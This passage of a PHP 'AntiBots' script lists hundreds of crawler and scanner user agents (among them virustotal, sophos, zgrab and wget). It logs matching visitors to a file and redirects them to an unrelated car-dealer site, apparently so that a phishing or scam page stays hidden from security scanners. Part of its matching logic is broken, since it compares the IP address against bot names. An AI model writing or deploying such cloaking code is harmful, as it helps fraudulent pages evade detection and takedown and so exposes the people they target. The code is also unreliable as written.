"mbot",
"meanpathbot",
"mediafox",
"mediapartners",
"mediawords",
"mercator",
"merzscope",
"microsoft url control",
"minirank",
"miva",
"mj12",
"mnogosearch",
"moget",
"monster",
"moose",
"motor",
"msnbot-media",
"muhstik-scan",
"multitext",
"muncher",
"muscatferret",
"mwd.search",
"myweb",
"najdi",
"nameprotect",
"nationaldirectory",
"nazilla",
"nbot",
"ncsa beta",
"nec-meshexplorer",
"nederland.zoek",
"neofonie",
"netEstate NE Crawler",
"netcarta webmap engine",
"netmechanic",
"netresearchserver",
"netscoop",
"newscan-online",
"nhse",
"node",
"nokia6682/",
"nomad",
"noyona",
"nutch",
"nzexplorer",
"oBot",
"objectssearch",
"obot",
"occam",
"okhttp",
"okhttp/2.5.0",
"omni",
"open text",
"openfind",
"openintelligencedata",
"orb search",
"osis-project",
"pack rat",
"page scorer",
"page_verifier",
"pageboy",
"pagebull",
"panscient",
"parasite",
"partnersite",
"patric",
"pbot",
"pcBrowser",
"pear.",
"pegasus",
"peregrinator",
"pgp key agent",
"phantom",
"phpdig",
"picosearch",
"piltdownman",
"pimptrain",
"pinpoint",
"pioneer",
"pipes",
"piranha",
"plumanalytics",
"plumtreewebaccessor",
"pogodak",
"poirot",
"polaris version",
"pompos",
"poppelsdorf",
"poppi",
"popular iconoclast",
"presto",
"privoxy",
"proximic",
"psycheclone",
"publisher",
"python",
"rambler",
"raven search",
"rbot",
"roach",
"road runner",
"roadhouse",
"robbie",
"robofox",
"robozilla",
"ruby",
"rules",
"s1z.ru",
"salty",
"sbider",
"sbot",
"scan.lol",
"scmguard",
"scooter",
"scoutjet",
"scrubby",
"search.",
"searchprocess",
"seek",
"semanticdiscovery",
"senrigan",
"seoscanners",
"serpstatbot",
"sexsearcher",
"sg-scout",
"shai'hulud",
"shark",
"shopwiki",
"sidewinder",
"sift",
"silk",
"simmany",
"simplepie",
"site searcher",
"site valet",
"siteexplorer",
"sitetech-rover",
"skymob.com",
"sleek",
"slurp",
"smartwit",
"sna-",
"snappy",
"snooper",
"sogou",
"sogou-test-spider",
"sogouspider",
"sohu",
"sophos",
"sp_auditbot",
"speedfind",
"sphere",
"sphider",
"spider",
"spinner",
"spyder",
"spyfu",
"steeler/",
"suke",
"suntek",
"supersnooper",
"surfnomore",
"sven",
"sygol",
"sysscan",
"szukacz",
"t-h-u-n-d-e-r-s-t-o-n-e",
"t-rex",
"tAkeOut",
"tach black widow",
"tarantula",
"tbot",
"templeton",
"theophrastus",
"titan",
"titin",
"tkwww",
"toutatis",
"translate",
"trendiction.com",
"trendiction.de",
"trident",
"tutorgig",
"twiceler",
"twisted",
"ucsd",
"udmsearch",
"unchaos",
"updated",
"url check",
"vagabondo",
"valkyrie",
"vbot",
"verticrawl",
"victoria",
"virus",
"virustotal",
"vision-search",
"volcano",
"voyager-hc",
"voyager/",
"w3c_validator",
"w3m2",
"w3mir",
"walker",
"wallpaper",
"wanderer",
"wapproxy",
"wauuu",
"wavefire",
"web core",
"web hopper",
"web wombat",
"webbandit",
"webcatcher",
"webcopy",
"webfoot",
"weblayers",
"weblight",
"weblinker",
"weblog monitor",
"webmeup-crawler",
"webmirror",
"webmonkey",
"webquest",
"webreaper",
"websitepulse",
"websnarf",
"webstolperer",
"webvac",
"webwalk",
"webwatch",
"webwombat",
"webzinger",
"wget",
"whizbang",
"whowhere",
"wild ferret",
"worldlight",
"wwwc",
"wwwster",
"x09Mozilla",
"x22Mozilla",
"xenu",
"xget",
"xift",
"xirq",
"xpymep1.exe",
"yandex",
"yanga",
"ybot",
"yeti",
"yodao",
"zao/",
"zauba.io",
"zbot",
"zgrab",
"zipcommander",
"zippp",
"zteopen",
"zyborg",
		);
foreach ($Bots as $Bot) {
	if(strpos($userAgent,$Bot) or substr_count($userAgent,strtolower($Bot))> 0 or $userAgent=="" or $userAgent==" " or $userAgent=="	"){
		$content = "AntiBots => ".$userAgent." [ User Agent ] ";
		$save=fopen("bots.txt","a+");
	    fwrite($save,$content);
	    fclose($save);
		header("Location: https://www.superhonda.com/");
		exit();
	}
	
}


foreach ($Bots as $Bot) {
	if(strpos($sys_ip,$Bot) or substr_count($sys_ip,strtolower($Bot))> 0 or $sys_ip=="" or $sys_ip==" " or $sys_ip=="	"){
		$content = "AntiBots => ".$sys_ip." [ User Agent ] ";
		$save=fopen("bots.txt","a+");
	    fwrite($save,$content);
	    fclose($save);
		header("Location: https://www.superhonda.com/");
		exit();
	}
	
}

?>